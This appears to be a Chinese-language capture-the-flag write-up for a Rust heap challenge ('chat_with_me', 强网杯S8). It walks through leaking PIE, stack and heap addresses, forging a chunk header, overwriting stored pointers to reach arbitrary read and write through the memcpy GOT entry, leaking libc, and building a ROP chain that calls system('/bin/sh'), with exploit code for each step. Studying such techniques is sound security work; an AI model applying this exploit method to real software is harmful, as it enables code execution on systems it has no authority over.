Rust堆利用：堆块伪造技术详解<\/h1>

1. 题目背景分析<\/h2>
本教学文档基于强网杯S8的chat_with_me<\/code>题目，这是一个Rust编写的堆利用题目，具有以下特点：<\/p>

表面上是传统的菜单堆题目，但实际堆操作与常规菜单堆不同<\/li>
程序使用Rust编写，静态分析难度大，函数包装复杂<\/li>
关键漏洞：通过show功能可以泄露栈上的敏感数据<\/li>
最终目标：通过堆块伪造技术实现任意地址读写，最终getshell<\/li>
<\/ul>
2. 关键功能分析<\/h2>
2.1 程序功能结构<\/h3>
程序提供四个基本功能：<\/p>

add()<\/strong> - 添加数据<\/li>
show(idx)<\/strong> - 显示指定索引的数据<\/li>
edit(idx, cont)<\/strong> - 编辑指定索引的数据<\/li>
delete(idx)<\/strong> - 删除指定索引的数据<\/li>
<\/ol>
2.2 内存布局特点<\/h3>

堆结构<\/strong>：heapaddr<\/code>存储的是栈地址，show操作通过解引用*(heapaddr)<\/code>来访问和泄露数据<\/li>
缓冲区<\/strong>：edit操作会将数据写入栈上后，同时复制到一个0x2010大小的堆块缓冲区<\/li>
指针存储<\/strong>：多次add后会分配0x50大小的堆块，这些堆块存储着各索引(0,1,2...)对应的栈地址指针<\/li>
<\/ul>
3. 漏洞利用路径<\/h2>
3.1 信息泄露阶段<\/h3>


泄露PIE基址<\/strong>：<\/p>

通过show功能泄露栈上数据<\/li>
从泄露数据中提取PIE相关地址计算基址<\/li>
<\/ul>
<\/li>

泄露栈地址<\/strong>：<\/p>

从泄露数据中提取栈指针<\/li>
为后续ROP链构造做准备<\/li>
<\/ul>
<\/li>

泄露堆基址<\/strong>：<\/p>

从泄露数据中提取堆指针<\/li>
计算堆基址用于伪造堆块<\/li>
<\/ul>
<\/li>
<\/ol>
3.2 堆块伪造技术<\/h3>
关键思路<\/h4>
控制0x50大小堆块中存储的指针，实现任意地址读写：<\/p>

通过edit操作控制0x2010大小的缓冲区<\/li>
释放该缓冲区到unsorted bin<\/li>
多次add重新申请0x50堆块，这些堆块将从被释放的缓冲区中分配<\/li>
通过edit覆盖这些堆块中的指针<\/li>
<\/ol>
伪造条件<\/h4>
伪造堆块需要满足两个关键条件：<\/p>

被free堆块的size的inuse位=1（防止与前一个堆块合并）<\/li>
通过size找到的next_chunk的inuse位=1（避免double free错误）<\/li>
<\/ol>
具体操作<\/h4>
# 伪造堆块头，使其能够被成功释放<\/span>
<\/span><\/span>edit(0<\/span>, b<\/span>"a"<\/span>*<\/span>0x20<\/span> +<\/span> p64(heapbase+<\/span>0xaa0<\/span>+<\/span>0x30<\/span>) +<\/span> p64(0x1fe1<\/span>))
<\/span><\/span><\/code><\/pre>3.3 利用过程<\/h3>


分配控制堆块<\/strong>：<\/p>
for<\/span> i in<\/span> range(0x4<\/span>):
<\/span><\/span>    add()
<\/span><\/span><\/code><\/pre><\/li>

覆盖关键指针<\/strong>：<\/p>

将索引0的指针覆盖为栈地址(stack-0x50)<\/li>
将索引1的指针覆盖为memcpy的GOT表地址<\/li>
<\/ul>
memcpy_got =<\/span> pie +<\/span> 0x61DF8<\/span>
<\/span><\/span>edit(0<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>*<\/span>0x30<\/span> +<\/span> p64(stack-<\/span>0x50<\/span>) +<\/span> p64(memcpy_got))
<\/span><\/span><\/code><\/pre><\/li>

泄露libc基址<\/strong>：<\/p>
show(1<\/span>)
<\/span><\/span># 处理泄露数据获取libc基址<\/span>
<\/span><\/span><\/code><\/pre><\/li>

构造ROP链<\/strong>：<\/p>
pop_rdi =<\/span> libcbase +<\/span> 0x000000000010f75b<\/span>
<\/span><\/span>system =<\/span> libcbase +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>binsh =<\/span> libcbase +<\/span> next(libc.<\/span>search(b<\/span>"\/bin\/sh"<\/span>))
<\/span><\/span>ret =<\/span> libcbase +<\/span> 0x2882f<\/span> 
<\/span><\/span>payload =<\/span> p64(pop_rdi) +<\/span> p64(binsh) +<\/span> p64(ret) +<\/span> p64(system)
<\/span><\/span>edit(0<\/span>, payload)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. Rust堆利用特点<\/h2>

动态分析为主<\/strong>：Rust代码静态分析困难，需依赖动态调试<\/li>
堆管理差异<\/strong>：Rust使用自己的堆管理机制，与glibc有所不同<\/li>
安全机制<\/strong>：Rust内置更多安全检查，需要找到绕过方法<\/li>
函数包装复杂<\/strong>：大量函数包装增加了逆向难度<\/li>
<\/ol>
5. 完整EXP关键点<\/h2>
# 信息泄露<\/span>
<\/span><\/span>add()
<\/span><\/span>show(0<\/span>)
<\/span><\/span># 处理泄露数据获取pie, stack, heapbase<\/span>
<\/span><\/span>
<\/span><\/span># 堆块伪造<\/span>
<\/span><\/span>edit(0<\/span>, b<\/span>"a"<\/span>*<\/span>0x20<\/span> +<\/span> p64(heapbase+<\/span>0xaa0<\/span>+<\/span>0x30<\/span>) +<\/span> p64(0x1fe1<\/span>))
<\/span><\/span>
<\/span><\/span># 重新分配控制堆块<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(0x4<\/span>):
<\/span><\/span>    add()
<\/span><\/span>
<\/span><\/span># 覆盖指针实现任意读写<\/span>
<\/span><\/span>memcpy_got =<\/span> pie +<\/span> 0x61DF8<\/span>
<\/span><\/span>edit(0<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>*<\/span>0x30<\/span> +<\/span> p64(stack-<\/span>0x50<\/span>) +<\/span> p64(memcpy_got))
<\/span><\/span>
<\/span><\/span># 泄露libc<\/span>
<\/span><\/span>show(1<\/span>)
<\/span><\/span># 计算libcbase<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链getshell<\/span>
<\/span><\/span>pop_rdi =<\/span> libcbase +<\/span> 0x000000000010f75b<\/span>
<\/span><\/span>system =<\/span> libcbase +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>binsh =<\/span> libcbase +<\/span> next(libc.<\/span>search(b<\/span>"\/bin\/sh"<\/span>))
<\/span><\/span>ret =<\/span> libcbase +<\/span> 0x2882f<\/span> 
<\/span><\/span>payload =<\/span> p64(pop_rdi) +<\/span> p64(binsh) +<\/span> p64(ret) +<\/span> p64(system)
<\/span><\/span>edit(0<\/span>, payload)
<\/span><\/span><\/code><\/pre>6. 总结与思考<\/h2>

Rust Pwn特点<\/strong>：需要更多依赖动态分析而非静态分析<\/li>
关键突破点<\/strong>：找到信息泄露途径和可控的内存区域<\/li>
利用链构造<\/strong>：结合堆操作特性和程序功能设计利用链<\/li>
适应性调整<\/strong>：不同环境可能需要调整堆布局参数<\/li>
<\/ol>
通过本案例可以学习到Rust环境下堆利用的特殊技巧，特别是如何利用堆块伪造技术实现从信息泄露到最终getshell的完整过程。<\/p>